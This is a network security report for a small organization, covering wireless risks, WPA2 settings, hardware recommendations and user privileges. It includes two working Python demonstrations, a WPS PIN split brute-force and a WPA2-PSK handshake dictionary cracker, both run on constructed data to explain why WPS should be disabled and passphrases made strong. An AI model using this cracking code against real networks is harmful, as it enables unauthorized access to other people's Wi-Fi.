I. Vulnerability Assessments
A wireless network in a 20-person organization has the same vulnerabilities as any other wireless network. Its defining property is that virtually anyone within radio range of the access point can reach the network, attempt unauthorized access, and interfere with the flow of information. The company's technicians must consider the following risks and vulnerabilities:
Default keys: These are the passwords the manufacturer ships in the router. Many administrators and end users never change the default password, which creates a risk for the organization. The NETGEAR MR814 router ships with a default key that several network administrators forget to change, increasing the exposure of the network.
Wi-Fi Protected Setup (WPS) failure: The failure lies in the PIN method. The PIN has eight digits, but the access point verifies it in two halves: it reports whether the first four digits are correct before the remaining digits are checked, and the eighth digit is only a checksum of the first seven. An attacker therefore does not have to try up to one hundred million combinations but only about ten thousand for the first half plus one thousand for the second. The only real remedy is to disable WPS.
MAC spoofing: The attack occurs when an outsider obtains the MAC address of one of the devices on the network and impersonates that device, for example to bypass MAC-address filtering.
Denial of Service: Denial of a resource or service. On a wireless network it can be carried out by flooding the network with disassociation or deauthentication frames, so that legitimate clients are repeatedly disassociated and re-associated and cannot use the network.
Access point spoofing: The attacker sets up a rogue access point that imitates the legitimate one ("evil twin"); clients that connect to it hand their traffic to the attacker.
Man in the middle: The attacker positions himself between two legitimate parties and can read and modify the information exchanged between them.
WLAN scanners: WLAN scanning, or a "surveillance attack", consists of walking or driving through the site to be attacked in order to discover the active WLAN networks and the physical equipment present, as preparation for a later attack or theft.
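The WPS weakness described above is easiest to see in numbers. The following Python example, added here and not part of the original report, simulates an access point that validates the PIN in two halves and counts how many attempts an attacker needs. The access point, the PIN and the attack loop are all constructed for the illustration; the checksum function is the standard WPS PIN checksum.

```python
"""Why a two-stage WPS PIN check collapses the search space (constructed example)."""


def wps_checksum(pin7: int) -> int:
    """Standard WPS checksum digit for the first seven digits of a PIN."""
    accum = 0
    n = pin7
    while n:
        accum += 3 * (n % 10)
        n //= 10
        accum += n % 10
        n //= 10
    return (10 - accum % 10) % 10


class SimulatedAP:
    """Toy access point: answers M4 (first half) and M6 (second half) separately,
    which is exactly the behaviour that leaks whether each half is correct."""

    def __init__(self, pin: str):
        assert len(pin) == 8 and pin.isdigit()
        self.first, self.second = pin[:4], pin[4:]
        self.m4_attempts = 0   # how many first-half guesses were answered
        self.m6_attempts = 0   # how many second-half guesses were answered

    def check_first_half(self, guess: str) -> bool:
        self.m4_attempts += 1
        return guess == self.first

    def check_second_half(self, guess: str) -> bool:
        self.m6_attempts += 1
        return guess == self.second


def split_attack(ap: SimulatedAP):
    """Brute-force each half independently; uses the checksum to skip
    impossible eighth digits. Returns the recovered PIN or None."""
    half1 = None
    for i in range(10_000):
        candidate = f"{i:04d}"
        if ap.check_first_half(candidate):
            half1 = candidate
            break
    if half1 is None:
        return None
    for j in range(1_000):
        pin7 = int(half1) * 1_000 + j
        candidate = f"{j:03d}{wps_checksum(pin7)}"
        if ap.check_second_half(candidate):
            return half1 + candidate
    return None


def search_space():
    """Worst-case guesses: naive 8-digit PIN vs. checksum-aware vs. split check."""
    return {
        "all_eight_digits": 10 ** 8,
        "checksum_known": 10 ** 7,
        "split_halves": 10 ** 4 + 10 ** 3,
    }


if __name__ == "__main__":
    ap = SimulatedAP("12345670")          # constructed PIN; checksum digit is 0
    recovered = split_attack(ap)
    print("recovered PIN:", recovered)
    print("M4 attempts:", ap.m4_attempts, "M6 attempts:", ap.m6_attempts)
    print("worst-case search space:", search_space())
```

Real access points add rate limiting or a temporary WPS lockout after a few failures, which slows the attack down but does not change the arithmetic; disabling WPS is the fix.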
II. Network/System Security Recommendations
The simplest way to reduce risk in a wireless network is to replace it with a wired one. Using a switch with an embedded firewall is the first step in improving the security of the organization's network. The recommendation for the wired network is the NETGEAR FVS318 ProSafe VPN Firewall Switch, priced at about 300 USD (Figure 1), which gives the administrator a switch and a firewall in a single device. The recent version of Windows Server (Figure 2) works with this switch and offers the administrator the Server Manager application, Dynamic Access Control, and the improved DirectAccess feature for secure connections between the server and its clients.
Figure 1 Switch with firewall application
If the network keeps its wireless access, the first step is to change the password the router ships with. The technicians can then choose between three security modes: open, WEP encryption, and WPA/WPA2.
Open and WEP are the least secure. With an open configuration anyone can join the network and read or modify traffic to every device on it; WEP can be broken in minutes with freely available tools. Either configuration must be replaced with WPA/WPA2.
Figure 2 Windows Server Screenshot
WPA/WPA2 Enterprise is the most secure but least familiar option. Each user authenticates individually (802.1X) with credentials validated by a RADIUS server, so there is no shared passphrase that can leak. It is not recommended here because of the effort of setting up the RADIUS server and managing the authentication information.
The recommended configuration for the organization is therefore WPA/WPA2 Personal (Figure 3). Here an intruder can only get in by capturing a client's four-way handshake and running an offline dictionary or brute-force attack against it: the attacker derives a key from each candidate passphrase in a word list and checks it against the captured handshake, and the larger the word list, the more likely a weak passphrase is found. Two caveats: WPA2 with AES should be preferred over the older WPA (TKIP), and the passphrase should be long and random, since a passphrase that is not in any word list cannot be recovered this way.
Figure 3 WPA and WPA2 configuration
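The offline attack described above, as an added example that is not part of the original report. It reproduces the key derivation a WPA2-Personal client performs (PBKDF2 to the PMK, the pairwise-key PRF to the KCK, and the HMAC-SHA1 MIC over EAPOL message 2), builds a constructed handshake frame with a sample SSID, MAC addresses, nonces and passphrase, and then runs a word list against it exactly as a cracker would. All values are constructed; nothing here is captured from a real network.

```python
"""WPA2-PSK offline dictionary attack against a constructed four-way handshake."""
import hashlib
import hmac

# Constructed sample parameters (not a real capture).
SSID = "SmallOffice"
AP_MAC = bytes.fromhex("00d0590a0b0c")
STA_MAC = bytes.fromhex("a4c3f01a2b3c")
ANONCE = hashlib.sha256(b"anonce-sample").digest()
SNONCE = hashlib.sha256(b"snonce-sample").digest()
MIC_OFFSET = 81          # MIC field position inside an EAPOL-Key frame
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512 built from HMAC-SHA1."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def kck_from_pmk(pmk: bytes) -> bytes:
    """First 16 bytes of the PTK are the key confirmation key (KCK)."""
    data = (min(AP_MAC, STA_MAC) + max(AP_MAC, STA_MAC)
            + min(ANONCE, SNONCE) + max(ANONCE, SNONCE))
    return prf512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, frame_with_zero_mic: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame)[:16]."""
    return hmac.new(kck, frame_with_zero_mic, hashlib.sha1).digest()[:MIC_LEN]


def build_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 with an all-zero MIC field (constructed)."""
    frame = bytearray(99)
    frame[0:2] = b"\x01\x03"                       # EAPOL version 1, type Key
    frame[2:4] = (95).to_bytes(2, "big")           # body length
    frame[4] = 0x02                                # descriptor type RSN
    frame[5:7] = b"\x01\x0a"                       # key info: v2, pairwise, MIC set
    frame[7:9] = b"\x00\x10"                       # key length 16
    frame[9:17] = (1).to_bytes(8, "big")           # replay counter
    frame[17:49] = snonce
    return bytes(frame)


def capture_handshake(passphrase: str) -> bytes:
    """What a sniffer sees: message 2 with the MIC the real client computed."""
    frame = build_msg2(SNONCE)
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, SSID))
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:]


def dictionary_attack(captured: bytes, candidates):
    """Try each candidate passphrase; return (passphrase, attempts) or (None, attempts)."""
    zeroed = captured[:MIC_OFFSET] + bytes(MIC_LEN) + captured[MIC_OFFSET + MIC_LEN:]
    target = captured[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    attempts = 0
    for cand in candidates:
        attempts += 1
        kck = kck_from_pmk(pmk_from_passphrase(cand, SSID))
        if hmac.compare_digest(eapol_mic(kck, zeroed), target):
            return cand, attempts
    return None, attempts


WORDLIST = ["password", "letmein", "Office2015", "netgear1", "sunshine"]  # constructed

if __name__ == "__main__":
    print(dictionary_attack(capture_handshake("netgear1"), WORDLIST))
    print(dictionary_attack(capture_handshake("v7#Lq!9pWzR3mTcX"), WORDLIST))
```

The 4096-round PBKDF2 is what makes each guess cost something, but it only buys time against a weak passphrase; the second run shows that a passphrase absent from the word list is simply not found.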
Technicians must follow a three-step procedure to verify that the organization network is secure:
a) Context definition. Before an intrusion test begins, the organization has to define its context: the scope of the test, the elements to be tested, where it will be carried out and by whom. It must be decided whether the test is broad or targeted, and whether it is internal or external. The test procedure requires the agreement of the organization's management.
b) Carrying out the intrusion tests. A sound methodology, which combines information gathering with tests adapted to the specific environment, is needed for the intrusion test to succeed. The process begins by collecting all the information about the network architecture in order to find its security vulnerabilities. The tool recommended for this purpose is McAfee Internet Security (Figure 4).
Figure 4 McAfee Internet Security
c) Results report and delivery. After the intrusion tests are complete, the technicians analyze all the information produced by the tests. They enumerate and prioritize the vulnerabilities, classify each risk as high, medium or low, and recommend a solution for each vulnerability. They also provide resources, such as Internet links, where additional information or patches for the vulnerabilities can be obtained.
Summary.
a) Use a wired connection through the NETGEAR FVS318 ProSafe VPN Firewall Switch with its embedded firewall.
b) If wireless access remains, select WPA2 with a strong passphrase and disable WPS.
c) Follow the three-step procedure to verify the organization's network security.
III. Application/End-User Security Recommendations
After the network security recommendations above have been applied, the end users, that is the twenty members of the organization and its "guests", must meet the following security standards:
■ Owner: The owner must configure his iPad with two-step identity verification. The first step is the device passcode, which prevents an intruder from using the iPad itself. The second step is a username and password to reach the network from the device. Because the server runs Windows Server, an interface application is needed on the iPad to protect both the device and the enterprise network. The recommendation is Norton Identity Safe, configured as described in the device's App Store. The software is proprietary, so the company holds an annual contract with the vendor (Norton) for software provision and support.
■ Low-privilege staff: The ten accountants, three administrative support specialists and two interns have basic network access: a username and password on their own workstation, the right to share information on the network, and the right to save information to central storage. They have no privilege to change the network configuration or to edit the master files.
■ High-privilege staff: The vice-president, the financial manager and the owner have the rights of the low-privilege staff plus the ability to edit the company's master files. Changes to the network configuration still require validation by the network technician.
All user and server transactions must be backed up every day to stand-alone equipment. Dell offers a suitable solution, the PowerVault 114X Tape Rack (Figure 5), an enclosure that can store up to 6 TB of data, priced at about 2000 USD.
Figure 5 PowerVault 114X Tape Rack
Summary of required equipment:
Ethical principles in information management:
The company must communicate to its employees, orally and in writing, the rules for use of the enterprise network, so as to guarantee the security of each user and of the network as a whole. The two basic principles are:
■ Connecting new devices to the network is forbidden. The network administrator and the management may authorize another device only after it has been brought up to the company's software standard.
■ Employees have both the right and the duty to use the network only with legitimate software and applications.
References